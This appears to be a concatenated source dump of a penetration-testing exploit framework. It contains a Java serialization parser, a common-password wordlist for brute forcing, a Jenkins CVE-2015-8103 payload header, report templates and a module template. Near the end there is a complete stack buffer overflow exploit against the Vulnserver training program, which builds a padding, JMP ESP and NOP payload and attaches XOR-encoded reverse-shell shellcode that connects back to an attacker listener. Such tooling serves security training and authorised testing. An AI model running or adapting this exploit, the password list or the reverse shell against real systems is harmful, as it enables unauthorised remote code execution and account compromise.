ret += ', '.join("0x%s" % byte.encode('hex') for byte in self.contents)
ret += ']'
return ret
class BlockDataLong(Element):
def __init__(self, stream=None, contents=''):
Element.__init__(self, stream)
self.contents = contents
self.length = len(contents)
def decode(self, io):
raw_length = io.read(4)
if not raw_length or len(raw_length) != 4:
raise Exception('Failed to unserialize BlockDataLong')
self.length = struct.unpack('>i', raw_length)[0]
if self.length == 0:
self.contents = ''
else:
self.contents = io.read(self.length)
if not self.contents or len(self.contents) != self.length:
raise Exception('Failed to unserialize BlockDataLong')
return self
def encode(self):
encoded = struct.pack(">I", [self.length])
encoded += self.contents
return encoded
def __str__(self):
return self.contents.__str__()
class ClassDesc(Element):
def __init__(self, stream=None):
Element.__init__(self, stream)
self.description = None
def decode(self, io):
content = decode_content(io, self.stream)
allowed_content = [NullReference, NewClassDesc, Reference, ProxyClassDesc]
if content.__class__ not in allowed_content:
raise Exception('ClassDesc unserialize failed')
self.description = content
return self
def encode(self):
encoded = ''
allowed_contents = [NullReference, NewClassDesc, Reference, ProxyClassDesc]
if self.description.__class__ not in allowed_contents:
raise Exception('ClassDesc unserialize failed')
encoded += encode_content(self.description)
return encoded
def __str__(self):
return print_content(self.description)
class EndBlockData(Element):
pass
class Field(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.type = ''
self.name = None
self.field_type = None
def decode(self, io):
code = io.read(1)
if not code or not self.is_valid(code):
raise Exception('Failed to unserialize Field')
self.type = Constants.TYPE_CODES[code]
utf = Utf(self.stream)
self.name = utf.decode(io)
if self.is_object():
self.field_type = self.decode_field_type(io)
return self
def encode(self):
if self.name.__class__ is not Utf:
raise Exception('Failed to serialize Field')
if not self.is_type_valid():
raise Exception('Failed to serialize Field')
encoded = ''
encoded += get_key_by_value(Constants.TYPE_CODES, self.type)
encoded += self.name.encode()
if self.is_object():
encoded += self.encode_field_type()
return encoded
def is_type_valid(self):
if self.type in Constants.TYPE_CODES.values():
return True
return False
def is_primitive(self):
if self.type in Constants.PRIMITIVE_TYPE_CODES.values():
return True
return False
def is_object(self):
if self.type in Constants.OBJECT_TYPE_CODES.values():
return True
return False
def is_valid(self, code):
if code in Constants.TYPE_CODES.keys():
return True
return False
def encode_field_type(self):
allowed_contents = [Utf, Reference]
if self.field_type.__class__ not in allowed_contents:
raise Exception('Failed to serialize Field')
encoded = encode_content(self.field_type)
return encoded
def decode_field_type(self, io):
allowed_contents = [Utf, Reference]
type = decode_content(io, self.stream)
if type.__class__ not in allowed_contents:
raise Exception('Failed to serialize Field')
return type
def __str__(self):
ret = self.name.__str__()
if self.is_primitive():
ret += " (%s)" % self.type
else:
ret += " (%s)" % self.field_type
return ret
class NewArray(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.array_description = None
self.type = ''
self.values = []
def decode(self, io):
class_desc = ClassDesc(self.stream)
self.array_description = class_desc.decode(io)
if self.stream:
self.stream.add_reference(self)
self.type = self.array_type()
values_length = self.decode_values_length(io)
for i in range(values_length):
value = self.decode_value(io)
self.values.append(value)
return self
def encode(self):
if self.array_description.__class__ is not ClassDesc:
raise Exception('Failed to serialize NewArray')
encoded = ''
encoded += self.array_description.encode()
encoded += struct.pack(">I", len(self.values))
for value in self.values:
encoded += self.encode_value(value)
return encoded
def decode_values_length(self, io):
values_length = io.read(4)
if not values_length or len(values_length) != 4:
raise Exception('Failed to unserialize NewArray')
return struct.unpack('>I', values_length)[0]
def array_type(self):
if not self.array_description:
raise Exception('Empty NewArray description')
if self.array_description.__class__ is not ClassDesc:
raise Exception('Unsupported NewArray description class')
desc = self.array_description.description
if desc.__class__ is Reference:
ref = desc.handle - Constants.BASE_WIRE_HANDLE
desc = self.stream.references[ref]
if desc.class_name.contents[0] != '[': #array
raise Exception('Unsupported NewArray description')
decoded_type = desc.class_name.contents[1]
if decoded_type in Constants.PRIMITIVE_TYPE_CODES.keys():
return Constants.PRIMITIVE_TYPE_CODES[decoded_type]
elif decoded_type == 'L': #object
return desc.class_name.contents[2:desc.class_name.contents.index(';')]
else:
raise Exception('Unsupported NewArray Type')
def decode_value(self, io):
if self.type == 'byte':
value = io.read(1)
if not value:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>B', value)[0]
elif self.type == 'char':
value = io.read(2)
if not value or len(value) != 2:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>ss', value)[0]
elif self.type == 'boolean':
value = io.read(1)
if not value:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>B', value)[0]
elif self.type == 'short':
value = io.read(2)
if not value or len(value) != 2:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>H', value)[0]
elif self.type == 'int':
value = io.read(4)
if not value or len(value) != 4:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>I', value)[0]
elif self.type == 'long':
value = io.read(8)
if not value or len(value) != 8:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>Q', value)[0]
elif self.type == 'float':
value = io.read(4)
if not value or len(value) != 4:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>F', value)[0]
elif self.type == 'double':
value = io.read(8)
if not value or len(value) != 8:
raise Exception('Failed to deserialize NewArray value')
value = struct.unpack('>D', value)[0]
else:
value = decode_content(io, self.stream)
return value
def encode_value(self, value):
if self.type == 'byte':
res = struct.pack('>B', value)
elif self.type == 'char':
res = struct.pack('>ss', value)
elif self.type == 'double':
res = struct.pack('>D', value)
elif self.type == 'float':
res = struct.pack('>F', value)
elif self.type == 'int':
res = struct.pack('>I', value)
elif self.type == 'long':
res = struct.pack('>Q', value)
elif self.type == 'short':
res = struct.pack('>H', value)
elif self.type == 'boolean':
res = struct.pack('>B', value)
elif self.type.__class__ is Element:
res = value.encode()
else:
res = encode_content(value)
return res
def __str__(self):
ret = self.type.__str__() + ', '
ret += '\n'.join(value.__str__() for value in self.values)
return ret
class NewClass(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.class_description = None
def decode(self, io):
class_desc = ClassDesc(self.stream)
self.class_description = class_desc.decode(io)
if self.stream:
self.stream.add_reference(self)
return self
def encode(self):
if self.class_description.__class__ != ClassDesc:
raise Exception('Failed to serialize NewClass')
encoded = ''
encoded += self.class_description.encode()
return encoded
def __str__(self):
return self.class_description.__str__()
class NewClassDesc(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.class_name = ""
self.serial_version = 0
self.flags = 0
self.fields = []
self.class_annotation = None
self.super_class = None
def decode(self, io):
utf = Utf(self.stream)
self.class_name = utf.decode(io)
self.serial_version = self.decode_serial_version(io)
if self.stream:
self.stream.add_reference(self)
self.flags = self.decode_flags(io)
field_length = self.decode_fields_length(io)
for i in range(0, field_length):
temp_field = Field(self.stream)
field = temp_field.decode(io)
self.fields.append(field)
annotation = Annotation(self.stream)
super_class = ClassDesc(self.stream)
self.class_annotation = annotation.decode(io)
self.super_class = super_class.decode(io)
return self
def encode(self):
if self.class_name.__class__ is not Utf and self.class_annotation.__class__ is not Annotation and self.super_class.__class__ is not ClassDesc:
raise Exception('Filed to serialize NewClassDesc')
encoded = ''
encoded += self.class_name.encode()
encoded += struct.pack('>Q', self.serial_version)
encoded += struct.pack('>B', self.flags)
encoded += struct.pack('>H', len(self.fields))
for field in self.fields:
encoded += field.encode()
encoded += self.class_annotation.encode()
encoded += self.super_class.encode()
return encoded
def decode_serial_version(self, io):
raw_serial = io.read(8)
if not raw_serial or len(raw_serial) != 8:
raise Exception('Failed to unserialize ClassDescription')
return struct.unpack('>Q', raw_serial)[0]
def decode_flags(self, io):
raw_flags = io.read(1)
if not raw_flags:
raise Exception('Failed to unserialize ClassDescription')
return struct.unpack('>b', raw_flags)[0]
def decode_fields_length(self, io):
fields_length = io.read(2)
if not fields_length or len(fields_length) != 2:
raise Exception('Failed to unserialize ClassDescription')
return struct.unpack('>h', fields_length)[0]
def __str__(self):
ret = self.class_name.__str__() + ", ["
ret += ', '.join(field.__str__() for field in self.fields)
ret += ']'
# if self.super_class.description.__class__ is NewClassDesc:
# ret += ", super_class: " + self.super_class.description.class_name.__str__()
# elif self.super_class.description.__class__ is Reference:
# ret += ", super_class: " + self.super_class.description.__str__()
return ret
class NewEnum(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.enum_description = None
self.constant_name = None
def decode(self, io):
class_desc = ClassDesc(self.stream)
self.enum_description = class_desc.decode(io)
if self.stream:
self.stream.add_reference(self)
self.constant_name = self.decode_constant_name(io)
return self
def encode(self):
if self.enum_description.__class__ is not ClassDesc or self.constant_name.__class__ is not Utf:
raise Exception('Failed to serialize EnumDescription')
encoded = ''
encoded += self.enum_description.encode()
encoded += encode_content(self.constant_name)
return encoded
def decode_constant_name(self, io):
content = decode_content(io, self.stream)
if content.__class__ is not Utf:
raise Exception('Failed to unserialize NewEnum')
return content
class NewObject(Element):
def __init__(self, stream=None):
Element.__init__(self, stream)
self.class_desc = None
self.class_data = []
def decode(self, io):
class_desc = ClassDesc(self.stream)
self.class_desc = class_desc.decode(io)
if self.stream:
self.stream.add_reference(self)
if self.class_desc.description.__class__ is NewClassDesc:
self.class_data = self.decode_class_data(io, self.class_desc.description)
elif self.class_desc.description.__class__ is Reference:
ref = self.class_desc.description.handle - Constants.BASE_WIRE_HANDLE
self.class_data = self.decode_class_data(io, self.stream.references[ref])
return self
def encode(self):
if self.class_desc.__class__ is not ClassDesc:
raise Exception('Failed to serialize NewObject')
encoded = ''
encoded += self.class_desc.encode()
for value in self.class_data:
if type(value) is list:
encoded += self.encode_value(value)
else:
encoded += encode_content(value)
return encoded
def decode_class_data(self, io, my_class_desc):
values = []
if my_class_desc.super_class.description.__class__ is not NullReference:
if my_class_desc.super_class.description.__class__ is Reference:
ref = my_class_desc.super_class.description.handle - Constants.BASE_WIRE_HANDLE
values.extend(self.decode_class_data(io, self.stream.references[ref]))
else:
values.extend(self.decode_class_data(io, my_class_desc.super_class.description))
values.extend(self.decode_class_fields(io, my_class_desc))
return values
def decode_class_fields(self, io, my_class_desc):
values = []
for field in my_class_desc.fields:
if field.is_primitive():
values.append(self.decode_value(io, field.type))
else:
content = decode_content(io, self.stream)
values.append(content)
return values
def decode_value(self, io, type):
if type == 'byte':
value_raw = io.read(1)
val = struct.unpack(">b", value_raw)[0]
value = ['byte', val]
elif type == 'char':
value_raw = io.read(2)
val = struct.unpack(">h", value_raw)[0]
value = ['char', val]
elif type == 'boolean':
value_raw = io.read(1)
val = struct.unpack(">B", value_raw)[0]
value = ['boolean', val]
elif type == 'short':
value_raw = io.read(2)
val = struct.unpack(">h", value_raw)[0]
value = ['short', val]
elif type == 'int':
value_raw = io.read(4)
val = struct.unpack(">i", value_raw)[0]
value= ['int', val]
elif type == 'long':
value_raw = io.read(8)
val = struct.unpack(">q", value_raw)[0]
value = ['long', val]
elif type == 'float':
value_raw = io.read(4)
val = struct.unpack(">f", value_raw)[0]
value = ['float', val]
elif type == 'double':
value_raw = io.read(8)
val = struct.unpack(">d", value_raw)[0]
value = ['double', val]
else:
raise Exception("Unknown typecode: %s" % type)
return value
def encode_value(self, value):
res = ''
if value[0] == 'byte':
res = struct.pack('>b', value[1])
elif value[0] == 'char':
res = struct.pack('>h', value[1])
elif value[0] == 'double':
res = struct.pack('>d', value[1])
elif value[0] == 'float':
res = struct.pack('>f', value[1])
elif value[0] == 'int':
res = struct.pack('>i', value[1])
elif value[0] == 'long':
res = struct.pack('>Q', value[1])
elif value[0] == 'short':
res = struct.pack('>h', value[1])
elif value[0] == 'boolean':
res = struct.pack('>B', value[1])
else:
raise Exception('Unsupported NewArray type')
return res
def __str__(self):
ret = ''
if self.class_desc.description.__class__ is NewClassDesc:
ret += self.class_desc.description.class_name.__str__()
elif self.class_desc.description.__class__ is ProxyClassDesc:
ret += ','.join(iface.contents.__str__() for iface in self.class_desc.description.interfaces)
elif self.class_desc.description.__class__ is Reference:
ret += hex(self.class_desc.description.handle - Constants.BASE_WIRE_HANDLE)
ret += ' => {'
data_str = ', '.join(data.__str__() for data in self.class_data)
ret += data_str
ret += '}'
return ret
class NullReference(Element):
pass
class ProxyClassDesc(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.interfaces = []
self.class_annotation = None
self.super_class = None
def decode(self, io):
if self.stream:
self.stream.add_reference(self)
interfaces_length = self.decode_interfaces_length(io)
for i in range(0, interfaces_length):
utf = Utf(self.stream)
interface = utf.decode(io)
self.interfaces.append(interface)
annotation = Annotation(self.stream)
super_class = ClassDesc(self.stream)
self.class_annotation = annotation.decode(io)
self.super_class = super_class.decode(io)
return self
def encode(self):
if self.class_annotation.__class__ is not Annotation and self.super_class.__class__ is not ClassDesc:
raise Exception('Failed to serialize ProxyClassDesc')
encoded = ''
encoded += struct.pack('>I', len(self.interfaces))
for interface in self.interfaces:
encoded += interface.encode()
encoded += self.class_annotation.encode()
encoded += self.super_class.encode()
return encoded
def decode_interfaces_length(self, io):
field_length = io.read(4)
if not field_length or len(field_length) != 4:
raise Exception('Failed to unserialize ProxyClassDesc')
return struct.unpack('>I', field_length)[0]
def __str__(self):
ret = '['
interfaces_str = ', '.join(interface.__str__() for interface in self.interfaces)
ret += interfaces_str + ']'
if self.super_class.description.__class__ is NewClassDesc:
ret += ", super_class: " + self.super_class.description.class_name.__str__()
elif self.super_class.description.__class__ is Reference:
ret += ", super_class: " + self.super_class.description.__str__()
return ret
class Reference(Element):
def __init__(self, stream=''):
Element.__init__(self, stream)
self.handle = 0
def decode(self, io):
handle_raw = io.read(4)
if not handle_raw or len(handle_raw) != 4:
raise Exception('Failed to unserialize Reference')
self.handle = struct.unpack('>I', handle_raw)[0]
return self
def encode(self):
if self.handle < Constants.BASE_WIRE_HANDLE:
raise Exception('Failed to serialize Reference')
encoded = ""
encoded += struct.pack('>I', self.handle)
return encoded
def __str__(self):
return hex(self.handle)
class Reset(Element):
pass
class Stream(Element):
def __init__(self, stream=None):
Element.__init__(self, stream)
self.magic = Constants.STREAM_MAGIC
self.version = Constants.STREAM_VERSION
self.contents = []
self.references = []
def decode(self, io):
self.magic = self.decode_magic(io)
self.version = self.decode_version(io)
try:
while 1:
content = decode_content(io, self)
self.contents.append(content)
except EOFError:
pass
return self
def encode(self):
encoded = ''
encoded += struct.pack('>H', self.magic)
encoded += struct.pack('>H', self.version)
for content in self.contents:
encoded += encode_content(content)
return encoded
def add_reference(self, ref):
self.references.append(ref)
def decode_magic(self, io):
magic = io.read(2)
if magic and len(magic) == 2 and struct.unpack('>H', magic)[0] == Constants.STREAM_MAGIC:
return Constants.STREAM_MAGIC
else:
raise Exception("Failed to unserialize Stream")
def decode_version(self, io):
version = io.read(2)
if version and struct.unpack('>H', version)[0] == Constants.STREAM_VERSION:
return Constants.STREAM_VERSION
else:
raise Exception('Failed to unserialize Stream')
class Utf(Element):
def __init__(self, stream='', contents=''):
Element.__init__(self, stream)
self.contents = contents
self.length = len(contents)
def decode(self, io):
raw_length = io.read(2)
if not raw_length or len(raw_length) != 2:
raise Exception('Failed to unserialize Utf')
self.length = struct.unpack('>H', raw_length)[0]
if self.length == 0:
self.contents = ""
else:
self.contents = io.read(self.length)
if not self.contents or len(self.contents) != self.length:
raise Exception('Failed to unserialize Utf')
return self
def encode(self):
encoded = struct.pack('>H', self.length)
encoded += self.contents
return encoded
def __str__(self):
return self.contents
class LongUtf(Utf):
def decode(self, io):
raw_length = io.read(8)
if not raw_length or len(raw_length) != 8:
raise Exception('Failed to unserialize LongUtf')
self.length = struct.unpack('>Q', raw_length)[0]
if self.length == 0:
self.contents = ""
else:
self.contents = io.read(self.length)
if not self.contents or len(self.contents) != self.length:
raise Exception('Failed to unserialize LongUtf')
return self
def encode(self):
encoded = struct.pack('>Q', [self.length])
encoded += self.contents
return encoded
def decode_content(io, stream):
opcode = io.read(1)
if not opcode:
raise EOFError()
opcode = struct.unpack('>B', opcode)[0]
if opcode == Constants.TC_BLOCKDATA:
block_data = BlockData(stream)
content = block_data.decode(io)
elif opcode == Constants.TC_BLOCKDATALONG:
block_data_long = BlockDataLong(stream)
content = block_data_long.decode(io)
elif opcode == Constants.TC_ENDBLOCKDATA:
end_bd = EndBlockData(stream)
content = end_bd.decode(io)
elif opcode == Constants.TC_OBJECT:
new_object = NewObject(stream)
content = new_object.decode(io)
elif opcode == Constants.TC_CLASS:
new_class = NewClass(stream)
content = new_class.decode(io)
elif opcode == Constants.TC_ARRAY:
new_array = NewArray(stream)
content = new_array.decode(io)
elif opcode == Constants.TC_STRING:
utf = Utf(stream)
content = utf.decode(io)
if stream:
stream.add_reference(content)
elif opcode == Constants.TC_LONGSTRING:
long_utf = LongUtf(stream)
content = long_utf.decode(io)
if stream:
stream.add_reference(content)
elif opcode == Constants.TC_ENUM:
new_enum = NewEnum(stream)
content = new_enum.decode(io)
elif opcode == Constants.TC_CLASSDESC:
new_class_desc = NewClassDesc(stream)
content = new_class_desc.decode(io)
elif opcode == Constants.TC_PROXYCLASSDESC:
proxy = ProxyClassDesc(stream)
content = proxy.decode(io)
elif opcode == Constants.TC_REFERENCE:
ref = Reference(stream)
content = ref.decode(io)
elif opcode == Constants.TC_NULL:
ref = NullReference(stream)
content = ref.decode(io)
elif opcode == Constants.TC_EXCEPTION:
raise Exception("Failed to unserialize unsupported TC_EXCEPTION content")
elif opcode == Constants.TC_RESET:
reset = Reset(stream)
content = reset.decode(io)
else:
raise Exception('Failed to unserialize content')
return content
def encode_content(content):
# TODO encode content
encoded = ''
if content.__class__ is BlockData:
encoded += struct.pack('>B', Constants.TC_BLOCKDATA)
elif content.__class__ is BlockDataLong:
encoded += struct.pack('>B', Constants.TC_BLOCKDATALONG)
elif content.__class__ is EndBlockData:
encoded += struct.pack('>B', Constants.TC_ENDBLOCKDATA)
elif content.__class__ is NewObject:
encoded += struct.pack('>B', Constants.TC_OBJECT)
elif content.__class__ is NewClass:
encoded += struct.pack('>B', Constants.TC_CLASS)
elif content.__class__ is NewArray:
encoded += struct.pack('>B', Constants.TC_ARRAY)
elif content.__class__ is Utf:
encoded += struct.pack('>B', Constants.TC_STRING)
elif content.__class__ is LongUtf:
encoded += struct.pack('>B', Constants.TC_LONGSTRING)
elif content.__class__ is NewEnum:
encoded += struct.pack('>B', Constants.TC_ENUM)
elif content.__class__ is NewClassDesc:
encoded += struct.pack('>B', Constants.TC_CLASSDESC)
elif content.__class__ is ProxyClassDesc:
encoded += struct.pack('>B', Constants.TC_PROXYCLASSDESC)
elif content.__class__ is NullReference:
encoded += struct.pack('>B', Constants.TC_NULL)
elif content.__class__ is Reset:
encoded += struct.pack('>B', Constants.TC_RESET)
elif content.__class__ is Reference:
encoded += struct.pack('>B', Constants.TC_REFERENCE)
else:
raise Exception('Failed to serialize content')
encoded += content.encode()
return encoded
def print_content(content):
ret = ''
if content.__class__ is BlockData:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is BlockDataLong:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is EndBlockData:
ret += print_class(content)
elif content.__class__ is NewObject:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is ClassDesc:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is NewClass:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is NewArray:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is Utf:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is LongUtf:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is NewEnum:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is NewClassDesc:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is ProxyClassDesc:
ret += "%s {%s}" % (print_class(content), str(content))
elif content.__class__ is NullReference:
ret += print_class(content)
elif content.__class__ is Reset:
ret += print_class(content)
elif content.__class__ is Reference:
ret += "%s {%s}" % (print_class(content), str(content))
else:
raise Exception('Failed to serialize content')
return ret
def print_class(content):
return content.__class__.__name__
def get_key_by_value(dictionary, search_value):
for key, value in dictionary.iteritems():
if value == search_value:
return key
raise Exception("There is no selected element in dictionary")
================================================
FILE: core/helpers/java/__init__.py
================================================
================================================
FILE: core/passwords.txt
================================================
123456
password
12345678
1234
pussy
12345
dragon
qwerty
696969
mustang
letmein
baseball
master
michael
football
shadow
monkey
abc123
pass
fuckme
6969
jordan
harley
ranger
iwantu
jennifer
hunter
fuck
2000
test
batman
trustno1
thomas
tigger
robert
access
love
buster
1234567
soccer
hockey
killer
george
sexy
andrew
charlie
superman
asshole
fuckyou
dallas
jessica
panties
pepper
1111
austin
william
daniel
golfer
summer
heather
hammer
yankees
joshua
maggie
biteme
enter
ashley
thunder
cowboy
silver
richard
fucker
orange
merlin
michelle
corvette
bigdog
cheese
matthew
121212
patrick
martin
freedom
ginger
blowjob
nicole
sparky
yellow
camaro
secret
dick
falcon
taylor
111111
131313
123123
bitch
hello
scooter
please
porsche
guitar
chelsea
black
diamond
nascar
jackson
cameron
654321
computer
amanda
wizard
xxxxxxxx
money
phoenix
mickey
bailey
knight
iceman
tigers
purple
andrea
horny
dakota
aaaaaa
player
sunshine
morgan
starwars
boomer
cowboys
edward
charles
girls
booboo
coffee
xxxxxx
bulldog
ncc1701
rabbit
peanut
john
johnny
gandalf
spanky
winter
brandy
compaq
carlos
tennis
james
mike
brandon
fender
anthony
blowme
ferrari
cookie
chicken
maverick
chicago
joseph
diablo
sexsex
hardcore
666666
willie
welcome
chris
panther
yamaha
justin
banana
driver
marine
angels
fishing
david
maddog
hooters
wilson
butthead
dennis
fucking
captain
bigdick
chester
smokey
xavier
steven
viking
snoopy
blue
eagles
winner
samantha
house
miller
flower
jack
firebird
butter
united
turtle
steelers
tiffany
zxcvbn
tomcat
golf
bond007
bear
tiger
doctor
gateway
gators
angel
junior
thx1138
porno
badboy
debbie
spider
melissa
booger
1212
flyers
fish
porn
matrix
teens
scooby
jason
walter
cumshot
boston
braves
yankee
lover
barney
victor
tucker
princess
mercedes
5150
doggie
zzzzzz
gunner
horney
bubba
2112
fred
johnson
xxxxx
tits
member
boobs
donald
bigdaddy
bronco
penis
voyager
rangers
birdie
trouble
white
topgun
bigtits
bitches
green
super
qazwsx
magic
lakers
rachel
slayer
scott
2222
asdf
video
london
7777
marlboro
srinivas
internet
action
carter
jasper
monster
teresa
jeremy
11111111
bill
crystal
peter
pussies
cock
beer
rocket
theman
oliver
prince
beach
amateur
7777777
muffin
redsox
star
testing
shannon
murphy
frank
hannah
dave
eagle1
11111
mother
nathan
raiders
steve
forever
angela
viper
ou812
jake
lovers
suckit
gregory
buddy
whatever
young
nicholas
lucky
helpme
jackie
monica
midnight
college
baby
cunt
brian
mark
startrek
sierra
leather
232323
4444
beavis
bigcock
happy
sophie
ladies
naughty
giants
booty
blonde
fucked
golden
0
fire
sandra
pookie
packers
einstein
dolphins
0
chevy
winston
warrior
sammy
slut
8675309
zxcvbnm
nipples
power
victoria
asdfgh
vagina
toyota
travis
hotdog
paris
rock
xxxx
extreme
redskins
erotic
dirty
ford
freddy
arsenal
access14
wolf
nipple
iloveyou
alex
florida
eric
legend
movie
success
rosebud
jaguar
great
cool
cooper
1313
scorpio
mountain
madison
987654
brazil
lauren
japan
naked
squirt
stars
apple
alexis
aaaa
bonnie
peaches
jasmine
kevin
matt
qwertyui
danielle
beaver
4321
4128
runner
swimming
dolphin
gordon
casper
stupid
shit
saturn
gemini
apples
august
3333
canada
blazer
cumming
hunting
kitty
rainbow
112233
arthur
cream
calvin
shaved
surfer
samson
kelly
paul
mine
king
racing
5555
eagle
hentai
newyork
little
redwings
smith
sticky
cocacola
animal
broncos
private
skippy
marvin
blondes
enjoy
girl
apollo
parker
qwert
time
sydney
women
voodoo
magnum
juice
abgrtyu
777777
dreams
maxwell
music
rush2112
russia
scorpion
rebecca
tester
mistress
phantom
billy
6666
albert
================================================
FILE: data/CVE-2015-8103/serialized_payload_header
================================================
<===[JENKINS REMOTING CAPACITY]===>
================================================
FILE: data/report_templates/common.html
================================================
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Report</title>
<style>
.succeeded {
background-color: #8FFC81;
}
.failed {
background-color: #FA7D7F;
}
.category_row {
left: 40px;
position: relative;
}
.entry {
font-weight: bold;
margin-top: 10px;
}
.categoryName {
font-size:26px;
font-weight: bold;
}
.commonInfo {
font-size: 26px;
font-weight: bold;
}
</style>
</head>
<body>
<div class="commonInfo">
<p>Server was started at: %s</p>
<p>Succeeded modules: %s</p>
<p>Failed modules: %s</p>
</div>
%s
</body>
</html>
================================================
FILE: data/report_templates/row_template.html
================================================
<div class="category_row {CLASS}">
<div class="entry" style="font-size:22px;">Name: {MODULE_NAME} ({IS_SUCCESS})</div>
<div class="entry" style="font-size:20px;">Description: </div>{DESCRIPTION}
<div class="entry">Notes:</div>{NOTES}
{OPTIONS}
{LISTENER}
<div class="entry">Module out:</div>{LOG}
<!-- <div>Shell connected:</div> {IS_SHELL_CONNECTED} -->
<div class="entry">Cve: <a href="https://www.google.com/search?q=CVE-{CVE}" target="_blank">{CVE}</a></div>
<br>
<hr>
</div>
================================================
FILE: docs/files/template.py
================================================
#!/usr/bin/env python
#IMPORTS SECTION
from collections import OrderedDict # for rigth options order
from Sploit import Sploit # base class for module
#INFO SECTION
INFO = {}
INFO['NAME'] = '' # Module name
INFO['DESCRIPTION'] = '' # Short description of vulnerability
INFO['VENDOR'] = '' # Vulnerable soft vendor's homepage
INFO['CVE Name'] = '' # CVE if exists(like 2017-9999)
INFO['NOTES'] = """ """ # Full description of vulnerability
INFO['DOWNLOAD_LINK'] = '' # Link to vulnerable soft
INFO['LINKS'] = [] # Some helpful links(like exploit's page on exploit-db or link to some article)
INFO['CHANGELOG'] = '' # Usually it's exploit writing date
INFO['PATH'] = 'General/' # Virtual path of module. It used by module tree in GUI
# OPTIONS SECTION
OPTIONS = OrderedDict()
OPTIONS['HOST'] = '127.0.0.1'
OPTIONS['PORT'] = 9999
class exploit(Sploit):
def __init__(self,host="",
port=0, ssl=False,
logger=None):
Sploit.__init__(self, logger=logger)
def args(self):
self.args = Sploit.args(self, OPTIONS)
def run(self):
#Get options from gui
self.args()
#YOUR CODE
##########
self.finish(True)
if __name__ == '__main__':
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()
================================================
FILE: docs/files/vulnserver_bof/vulnserver_buffer_overflow.py
================================================
#!/usr/bin/env python
#IMPORTS SECTION
from collections import OrderedDict # for rigth options order
from Sploit import Sploit # base class for module
import socket
from shellcodes.Shellcodes import OSShellcodes
from shellcodes.ShellUtils import Constants
#INFO SECTION
INFO = {}
INFO['NAME'] = 'vulnserver_buffer_overflow' # Module name
INFO['DESCRIPTION'] = 'Vulnserver Stack-Based Buffer Overflow' # Short description of vulnerability
INFO['VENDOR'] = 'http://www.thegreycorner.com/2010/12/introducing-vulnserver.html' # Vulnerable soft vendor's homepage
INFO['CVE Name'] = '' # CVE if exists(like 2017-9999)
INFO['NOTES'] = """ """ # Full description of vulnerability
INFO['DOWNLOAD_LINK'] = 'http://sites.google.com/site/lupingreycorner/vulnserver.zip' # Link to vulnerable soft
INFO['LINKS'] = ['http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-introduction',
'http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-2-exploiting-the-stack-overflow/',
'http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-3-%E2%80%94-adding-shellcode'] # Some helpful links(like exploit's page on exploit-db or link to some article)
INFO['CHANGELOG'] = '17 Apr 2017' # Usually used for exploit writing date
INFO['PATH'] = 'Tutorials/' # Virtual path of module. It used in module tree in GUI
# OPTIONS SECTION
OPTIONS = OrderedDict()
OPTIONS['HOST'] = '192.168.1.176'
OPTIONS['PORT'] = 9999
OPTIONS['CONNECTBACK_IP'] = '192.168.1.32'
class exploit(Sploit):
def __init__(self,host="",
port=0, ssl=False,
logger=None):
Sploit.__init__(self, logger=logger)
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', OPTIONS['HOST'])
self.port = self.args.get('PORT', OPTIONS['PORT'])
self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS['CONNECTBACK_IP'])
if self.args['listener']:
self.listener_port = self.args['listener']['PORT']
else:
self.log('[-] Please enable listener')
self.finish(False)
def generate_shellcode(self):
badchars = ['\x00', '\x0a', '\x0d'] # badchars
sc = OSShellcodes(Constants.OS.WINDOWS,
Constants.OS_ARCH.X32,
self.connectback_ip,
self.listener_port,
badchars)
shell = sc.create_shellcode(
Constants.ShellcodeConnection.REVERSE, # tcp connect back shellcode
encode=Constants.EncoderType.XOR # Encoding to remove badchars
)
return shell
def run(self):
#Get options from gui
self.args()
#YOUR CODE
sock = socket.socket()
sock.connect((self.host, self.port)) # connects to vulnserver.exe
payload = 'TRUN .'
payload += 'A' * 2006
payload += '\xAF\x11\x50\x62' # essfunc.dll JMP ESP(0x625011AF)
payload += '\x90' * 16 # 16 NOPs
payload += self.generate_shellcode()
sock.sendall(payload)
##########
self.finish(True)
if __name__ == '__main__':
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()
================================================
FILE: docs/index.html
================================================
<!DOCTYPE html>
<html>
<head>
<title>EaST Tutorials</title>
<script type="text/javascript" src='js/bootstrap.min.js'></script>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
</head>
<body>
<div class="panel panel-default">
<div class="panel-heading">Bootstrap test</div>
<div class="panel-body">
Bootstrap test
</div>
</div>
</body>
</html>
================================================
FILE: help/README.txt
================================================
================================================
FILE: listener/__init__.py
================================================
================================================
FILE: listener/bind_connector.py
================================================
import socket
import asyncore
import os, sys
import select
import errno
from websocket import create_connection
from Commands import APIClient
import json
